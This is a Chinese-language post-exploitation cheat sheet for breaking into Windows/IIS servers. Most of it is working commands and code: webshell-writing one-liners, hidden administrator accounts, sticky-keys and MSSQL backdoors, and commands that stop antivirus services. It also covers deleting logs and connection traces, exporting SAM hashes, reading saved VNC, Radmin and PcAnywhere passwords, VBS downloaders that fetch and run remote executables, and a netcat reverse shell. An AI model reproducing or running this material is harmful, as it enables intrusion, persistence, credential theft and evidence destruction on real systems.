參考:http://netsecurity.51cto.com/art/201312/426150_all.htm
1.旁站路徑問題
2.用以下VBS:
On Error Resume Next If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then MsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage:Cscript vWeb.vbs", 4096, "Lilo" WScript.Quit End If Set objservice = GetObject("IIS://LocalHost/W3SVC") For Each obj3w In objservice If IsNumeric(obj3w.Name) Then Set OService = GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name) Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT") If Err <> 0 Then WScript.Quit (1) WScript.Echo Chr(10) & "[" & OService.ServerComment & "]" For Each Binds In OService.ServerBindings Web = "{ " & Replace(Binds, ":", " } { ") & " }" WScript.Echo Replace(Split(Replace(Web, " ", ""), "}{")(2), "}", "") Next WScript.Echo "Path : " & VDirObj.Path End If Next
3.iis_spy 列舉((注:需要支持ASPX,反IISSPY的方法:將 activeds.dll,activeds.tlb 降權)
4.得到目標站目錄,不能直接跨的。可以通過“echo ^<%execute(request(“cmd”))%^> >>X:\目標目錄\X.asp”或者“copy 腳本文件 X:\目標目錄\X.asp”像目標目錄寫入webshell,或者還可以試試type命令。
網站可能目錄(注:一般是虛擬主機類):
data/htdocs.網站/網站/
cmd 下操作*** 相關知識,資料:
#允許administrator 撥入***:
netsh ras set user administrator permit
#禁止administrator 撥入***:
netsh ras set user administrator deny
#查看哪些用戶可以撥入***:
netsh ras show user
#查看*** 分配IP的方式:
netsh ras ip show ipconfig
#使用地址池的方式分配IP:
netsh ras ip set addrassign method = pool
#地址池的範圍是從192.168.3.1到192.168.3.254:
netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254
CMD,dos 命令行下添加SQL用戶的方法:
需要管理員權限,在命令下先建立一個“c:\test.py”文件,內容如下:
exec master.dbo.sp_addlogin test,123 EXEC sp_addsrvrolemember 'test,'sysadmin'
然後在DOS下執行:
cmd.exe /c isql -E /U alma /P /i c:\test.qry
另類的加用戶方法:
在刪掉了 net.exe 和不用adsi之外,新的加用戶的方法。代碼如下:
js:
var o=new ActiveXObject( "Shell.Users" ); z=o.create("test") ; z.changePassword("123456","") z.setting("AccountType")=3; vbs: view source Set o=CreateObject( "Shell.Users" ) Set z=o.create("test") z.changePassword "123456","" z.setting("AccountType")=3
cmd 訪問控制權限:
命令如下:
cacls c: /e /t /g everyone:F #c盤everyone權限 cacls "目錄" /d everyone #everyone不可讀,包括admin
備註:
反制方法,在文件夾安全設置裏將everyone設定爲不可讀,如果沒有安全性選項:工具-文件夾選型-使用簡單的共享去掉即可。
3389 相關,以下配合PR更好:
a.防火牆TCP/IP 篩選。(關閉:net stop policyagent & net stop sharedaccess)
b.內網環境(lcx.exe)
c.終端服務器超出了最大允許連接(XP 運行:mstsc /admin;2003 運行:mstsc /console)
查詢終端端口:
REG query HKLM\SYSTEM\CurrentControlSet\Control\Teminal" "Server\WinStations\RDP-Tcp /v PortNumber
2.開啓xp & 2003 終端服務:
REG ADD HKLM\SYSTEM\CurrentCtrolSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3.更改終端端口爲2008(十六進制爲:0x7d8):
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
4.取消xp&2003系統防火牆對終端服務的限制級IP連接的限制:
REG ADD HKLM\SYSTEM\CurrentContolSet\Services\SharedAccess\Paramters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled :@ xpsp2res.dll,-22009 /f
create table a (cmd text); insert into a values ("set wshshell=createobject (""wscript.shell"")"); insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)"); insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)"); select * from a into outfile "C:\\Documents and Settings\\All Users\\「開始」菜單\\程序\\啓動\\a.vbs";
BS 馬的portmap功能,類似LCX做轉發。如果支持ASPX,用這個轉發會隱蔽點。(注:一直忽略的功能)
關閉常見殺毒軟件(把殺毒軟件的所有權去掉):
處理變態若頓企業版:
net stop "Symantec AntiVirus" /y net stop "Symantec AntiVirus Definitin Watcher" /y net stop "Symantec Event Manager" /y net stop "Symantec Event Notification" /y net stop "Symantec Settings Manager" /y
邁克菲:
net stop "McAfee McShied"
賽門鐵克病毒日誌:
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Logs
Nod32病毒備份:
C:\Docume~1\Administrator\Local Settings\Application Data\ESET\ESET NOD32 Antivirus\Quarantine
nod32移除密碼保護:
刪除“HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Info\PackageID”即可
安裝5次shift後門, 粘滯鍵後門,替換SHIFT後門:
5次SHIFT,粘滯鍵後門:
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
替換shift後門:
attrib c:\windows\system32\sethc.exe -h -r -s attrib c:\windows\system32\dllcache\sethc.exe -h -r -s del c:\windows\system32\sethc.exe copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe attrib c:\windows\system32\sethc.exe +h +r +s attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
添加隱藏系統賬號:
執行命令:
net user admin$ 123456 /add&net localgroup administrators admin$ /add
2.導出註冊表SAM下賬戶的兩個鍵值。
3.在 用戶管理界面裏的admin$ 刪除,然後備份的註冊表導回去。
4.利用hacker defender 把相關用戶註冊表隱藏。
安裝 MDSSQL 擴展後門:
USE master; EXEC sp_addextendedproc 'xp_helpsystem','xp_helpsystem.dll'; GRANT exec On xp_helpsystem TO public;
處理 服務器SMFTP日誌:
在“C:\WINNT\system32\LogFiles\MSFTPSVC1\”下有 ex011120.log / ex011121.log / ex011124.log 三個文件,直接刪除 ex0111124.log 不成功,顯示“原文件…正在使用”。
當然可以直接刪除“ex011120.log / ex011121.log”。然後用記事本打開“ex0111124.log”,刪除裏面的一些內容後,保存,覆蓋退出,成功。
當停止“msftpsvc”服務後可直接刪除“ex011124.log”。
MSSQL查詢分析器連接記錄清除:
MSSQL 2000 位於註冊表如下:
HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers
找到接接過的信息刪除。
MSSQL 2005 是在:
C:\Documents and Settings\\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
防BT系統攔截技巧,可以使用遠程下載shell:
<% Sub eWebEditor_SaveRemoteFile(s_LocalFileName, s_RemoteFileUrl) Dim Ads, Retrieval, GetRemoteData On Error Resume Next Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP") With Retrieval .Open "Get", s_RemoteFileUrl, False, "", "" .Send GetRemoteData = .ResponseBody End With Set Retrieval = Nothing Set Ads = Server.CreateObject("Adodb.Stream") With Ads .Type = 1 .Open .Write GetRemoteData .SaveToFile Server.MapPath(s_LocalFileName), 2 .Cancel() .Close() End With Set Ads = Nothing End Sub eWebEditor_SaveRemoteFile "your shell's name", "your shell'urL" %>
防BT系統攔截技巧,可以使用遠程下載shell,也達到了隱藏自身的效果,也可以做爲超隱蔽的後門,神馬的免殺webshell,用服務器安全工具一掃通通掛掉了。
VNC、Radmin、PcAnywhere 的提權方法:
首先利用 shell 讀取 vnc 保存在註冊表中的密文,然後再使用工具VNC4X破解。
註冊表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
Radmin 默認端口是4899,先獲取密碼和端口,如下位置:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter //默認密碼註冊表位置 HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默認端口註冊表位置
然後用HASH版連接。
如果我們拿到一臺主機的WEBSEHLL。通過查找發現其上安裝有 PcAnywhere 同時保存密碼文件的目錄是允許我們的IUSER權限訪問,我們可以下載這個CIF文件到本地破解,再通過 PcAnywhere 從本機登陸服務器。
保存密碼的CIF文件,不是位於PcAnywhere的安裝目錄,而且位於安裝PcAnywhere所安裝盤的:
“\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\”
如果PcAnywhere安裝在“D:\program\”文件夾下,那麼PcAnywhere的密碼文件就保存在:“D:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\”文件夾下。
WinWebMail 提權加用戶:
WinWebMail目錄下的web必須設置everyone權限可讀可寫,在開始程序裏,找到WinWebMail快捷方式,接下來,看路徑,訪問“路徑\web”傳 shell,訪問shell後,權限是system,直接放遠控進啓動項,等待下次重啓。
沒有刪cmd組件的可以直接加用戶,7i24的web目錄也是可寫,權限爲administrator。
1433 SA權限構建注入點:
<% strSQLServerName = "服務器ip" strSQLDBUserName = "數據庫帳號" strSQLDBPassword = "數據庫密碼" strSQLDBName = "數據庫名稱" Set conn = server.CreateObject("ADODB.Connection") strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";" conn.open strCon Dim rs, strSQL, id Set rs = server.CreateObject("ADODB.recordset") id = request("id") strSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3 rs.Close %>
提權篇:
先執行systeminfo
token 漏洞補丁號 KB956572
Churrasco kb952004
命令行RAR打包~~·
1rar a -k -r -s -m3 c:\1.rar c:\folder
收集系統信息的腳本:
for window: @echo off echo #########system info collection systeminfo ver hostname net user net localgroup net localgroup administrators net user guest net user administrator echo #######at- with atq##### echo schtask /query echo echo ####task-list############# tasklist /svc echo echo ####net-work infomation ipconfig/all route print arp -a netstat -anipconfig /displaydns echo echo #######service############ sc query type= service state= all echo #######file-############## cd \ tree -F
gethash 不免殺怎麼獲取本機 hash:
首先導出註冊表:
Windows 2000:regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" Windows 2003:reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg
注意權限問題,一般註冊表默認sam目錄是不能訪問的。需要設置爲完全控制以後纔可以訪問(界面登錄的需要注意,system權限可以忽略)。
接下來就簡單了,把導出的註冊表,down 到本機,修改註冊表頭導入本機,然後用抓去hash的工具抓本地用戶就OK了
hash 抓完了記得把自己的賬戶密碼改過來哦!
當 GetHashes 獲取不到 hash 時,可以用冰刃把 sam 複製到桌面。據我所知,某人是用這個方法虛擬機多次因爲不知道密碼而進不去!~
vbs 下載者:
echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs echo sGet.Mode = 3 >>c:\windows\cftmon.vbs echo sGet.Type = 1 >>c:\windows\cftmon.vbs echo sGet.Open() >>c:\windows\cftmon.vbs echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs cftmon.vbs
2.
On Error Resume Next:Dim iRemote,iLocal,s1,s2 iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0)) s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream" Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send() Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open() sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2 cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe create table a (cmd text): view source insert into a values ("set wshshell=createobject (""wscript.shell"")"); insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)"); insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)"); select * from a into outfile "C:\\Documents and Settings\\All Users\\「開始」菜單\\程序\\啓動\\a.vbs";
Cmd 下目錄的操作技巧:
列出d的所有目錄:
for /d %i in (d:\freehost\*) do @echo %i
把當前路徑下文件夾的名字只有1-3個字母的顯示出來:
for /d %i in (???) do @echo %i
以當前目錄爲搜索路徑,把當前目錄與下面的子目錄的全部EXE文件列出:
for /r %i in (*.exe) do @echo %i
以指定目錄爲搜索路徑,把當前目錄與下面的子目錄的所有文件列出:
for /r "f:\freehost\hmadesign\web\" %i in (*.*) do @echo %i
這個會顯示a.txt裏面的內容,因爲/f的作用,會讀出a.txt中:
for /f %i in (c:\1.txt) do echo %i
delims=後的空格是分隔符,tokens是取第幾個位置:
for /f "tokens=2 delims= " %i in (a.txt) do echo %i
Windows 系統下的一些常見路徑(可以將c盤換成d,e盤,比如星外虛擬主機跟華衆得,一般都放在d盤):
c:\windows\php.ini c:\boot.ini c:\1.txt c:\a.txt c:\CMailServer\config.ini c:\CMailServer\CMailServer.exe c:\CMailServer\WebMail\index.asp c:\program files\CMailServer\CMailServer.exe c:\program files\CMailServer\WebMail\index.asp C:\WinWebMail\SysInfo.ini C:\WinWebMail\Web\default.asp C:\WINDOWS\FreeHost32.dll C:\WINDOWS\7i24iislog4.exe C:\WINDOWS\7i24tool.exe c:\hzhost\databases\url.asp c:\hzhost\hzclient.exe C:\Documents and Settings\All Users\「開始」菜單\程序\7i24虛擬主機管理平臺\自動設置[受控端].lnk C:\Documents and Settings\All Users\「開始」菜單\程序\Serv-U\Serv-U Administrator.lnk C:\WINDOWS\web.config c:\web\index.html c:\www\index.html c:\WWWROOT\index.html c:\website\index.html c:\web\index.asp c:\www\index.asp c:\wwwsite\index.asp c:\WWWROOT\index.asp c:\web\index.php c:\www\index.php c:\WWWROOT\index.php c:\WWWsite\index.php c:\web\default.html c:\www\default.html c:\WWWROOT\default.html c:\website\default.html c:\web\default.asp c:\www\default.asp c:\wwwsite\default.asp c:\WWWROOT\default.asp c:\web\default.php c:\www\default.php c:\WWWROOT\default.php c:\WWWsite\default.php C:\Inetpub\wwwroot\pagerror.gif c:\windows\notepad.exe c:\winnt\notepad.exe C:\Program Files\Microsoft Office\OFFICE10\winword.exe C:\Program Files\Microsoft Office\OFFICE11\winword.exe C:\Program Files\Microsoft Office\OFFICE12\winword.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files\winrar\rar.exe C:\Program Files\360\360Safe\360safe.exe C:\Program Files\360Safe\360safe.exe C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log c:\ravbin\store.ini c:\rising.ini C:\Program Files\Rising\Rav\RsTask.xml C:\Documents and Settings\All Users\Start Menu\desktop.ini C:\Documents and Settings\Administrator\My Documents\Default.rdp C:\Documents and Settings\Administrator\Cookies\index.dat C:\Documents and Settings\Administrator\My Documents\新建 文本文檔.txt C:\Documents and Settings\Administrator\桌面\新建 文本文檔.txt C:\Documents and Settings\Administrator\My Documents\1.txt C:\Documents and Settings\Administrator\桌面\1.txt C:\Documents and Settings\Administrator\My Documents\a.txt C:\Documents and Settings\Administrator\桌面\a.txt C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg E:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm C:\Program Files\RhinoSoft.com\Serv-U\Version.txt C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini C:\Program Files\Symantec\SYMEVENT.INF C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini C:\MySQL\MySQL Server 5.0\my.ini C:\Program Files\MySQL\MySQL Server 5.0\my.ini C:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm C:\Program Files\MySQL\MySQL Server 5.0\COPYING C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe c:\MySQL\MySQL Server 4.1\bin\mysql.exe c:\MySQL\MySQL Server 4.1\data\mysql\user.frm C:\Program Files\Oracle\oraconfig\Lpk.dll C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe C:\WINDOWS\system32\inetsrv\w3wp.exe C:\WINDOWS\system32\inetsrv\inetinfo.exe C:\WINDOWS\system32\inetsrv\MetaBase.xml C:\WINDOWS\system32\inetsrv\iisa, dmpwd\achg.asp C:\WINDOWS\system32\config\default.LOG C:\WINDOWS\system32\config\sam C:\WINDOWS\system32\config\system c:\CMailServer\config.ini c:\program files\CMailServer\config.ini c:\tomcat6\tomcat6\bin\version.sh c:\tomcat6\bin\version.sh c:\tomcat\bin\version.sh c:\program files\tomcat6\bin\version.sh C:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log c:\Apache2\Apache2\bin\Apache.exe c:\Apache2\bin\Apache.exe c:\Apache2\php\license.txt C:\Program Files\Apache Group\Apache2\bin\Apache.exe c:\Program Files\QQ2007\qq.exe c:\Program Files\Tencent\, qq\User.db c:\Program Files\Tencent\qq\qq.exe c:\Program Files\Tencent\qq\bin\qq.exe c:\Program Files\Tencent\qq2009\qq.exe c:\Program Files\Tencent\qq2008\qq.exe c:\Program Files\Tencent\qq2010\bin\qq.exe c:\Program Files\Tencent\qq\Users\All Users\Registry.db C:\Program Files\Tencent\TM\TMDlls\QQZip.dll c:\Program Files\Tencent\Tm\Bin\Txplatform.exe c:\Program Files\Tencent\RTXServer\AppConfig.xml C:\Program Files\Foxmal\Foxmail.exe C:\Program Files\Foxmal\accounts.cfg C:\Program Files\tencent\Foxmal\Foxmail.exe C:\Program Files\tencent\Foxmal\accounts.cfg C:\Program Files\LeapFTP 3.0\LeapFTP.exe C:\Program Files\LeapFTP\LeapFTP.exe c:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt C:\Program Files\FlashFXP\FlashFXP.ini C:\Program Files\FlashFXP\flashfxp.exe c:\Program Files\Oracle\bin\regsvr32.exe c:\Program Files\騰訊遊戲\QQGAME\readme.txt c:\Program Files\tencent\騰訊遊戲\QQGAME\readme.txt c:\Program Files\tencent\QQGAME\readme.txt C:\Program Files\StormII\Storm.exe
各種網站的配置文件相對路徑大全:
/config.php ../../config.php ../config.php ../../../config.php /config.inc.php ./config.inc.php ../../config.inc.php ../config.inc.php ../../../config.inc.php /conn.php ./conn.php ../../conn.php ../conn.php ../../../conn.php /conn.asp ./conn.asp ../../conn.asp ../conn.asp ../../../conn.asp /config.inc.php ./config.inc.php ../../config.inc.php ../config.inc.php ../../../config.inc.php /config/config.php ../../config/config.php ../config/config.php ../../../config/config.php /config/config.inc.php ./config/config.inc.php ../../config/config.inc.php ../config/config.inc.php ../../../config/config.inc.php /config/conn.php ./config/conn.php ../../config/conn.php ../config/conn.php ../../../config/conn.php /config/conn.asp ./config/conn.asp ../../config/conn.asp ../config/conn.asp ../../../config/conn.asp /config/config.inc.php ./config/config.inc.php ../../config/config.inc.php ../config/config.inc.php ../../../config/config.inc.php /data/config.php ../../data/config.php ../data/config.php ../../../data/config.php /data/config.inc.php ./data/config.inc.php ../../data/config.inc.php ../data/config.inc.php ../../../data/config.inc.php /data/conn.php ./data/conn.php ../../data/conn.php ../data/conn.php ../../../data/conn.php /data/conn.asp ./data/conn.asp ../../data/conn.asp ../data/conn.asp ../../../data/conn.asp /data/config.inc.php ./data/config.inc.php ../../data/config.inc.php ../data/config.inc.php ../../../data/config.inc.php /include/config.php ../../include/config.php ../include/config.php ../../../include/config.php /include/config.inc.php ./include/config.inc.php ../../include/config.inc.php ../include/config.inc.php ../../../include/config.inc.php /include/conn.php ./include/conn.php ../../include/conn.php ../include/conn.php ../../../include/conn.php /include/conn.asp ./include/conn.asp ../../include/conn.asp ../include/conn.asp ../../../include/conn.asp /include/config.inc.php ./include/config.inc.php ../../include/config.inc.php ../include/config.inc.php ../../../include/config.inc.php /inc/config.php ../../inc/config.php ../inc/config.php ../../../inc/config.php /inc/config.inc.php ./inc/config.inc.php ../../inc/config.inc.php ../inc/config.inc.php ../../../inc/config.inc.php /inc/conn.php ./inc/conn.php ../../inc/conn.php ../inc/conn.php ../../../inc/conn.php /inc/conn.asp ./inc/conn.asp ../../inc/conn.asp ../inc/conn.asp ../../../inc/conn.asp /inc/config.inc.php ./inc/config.inc.php ../../inc/config.inc.php ../inc/config.inc.php ../../../inc/config.inc.php /index.php ./index.php ../../index.php ../index.php ../../../index.php /index.asp ./index.asp ../../index.asp ../index.asp ../../../index.asp
去除TCP IP篩選:
TCP/IP篩選在註冊表裏有三處,分別是:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
分別用以下命令來導出註冊表項:
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
然後再把三個文件裏的:
“EnableSecurityFilters"=dword:00000001”
改爲:
“EnableSecurityFilters"=dword:00000000”
再將以上三個文件分別用以下命令導入註冊表即可:
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg
Webshell 提權小技巧:
CMD路徑:
c:\windows\temp\cmd.exe
Nc 也在同目錄下,例如反彈cmdshell:
"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
通常都不會成功。
而直接在 cmd 路徑上輸入:
c:\windows\temp\nc.exe
命令輸入:
-vv ip 999 -e c:\windows\temp\cmd.exe
卻能成功。。這個不是重點
我們通常執行 pr.exe 或 Churrasco.exe 的時候也需要按照上面的方法才能成功。
命令行調用 RAR 打包:
rar a -k -r -s -m3 c:\1.rar c:\folde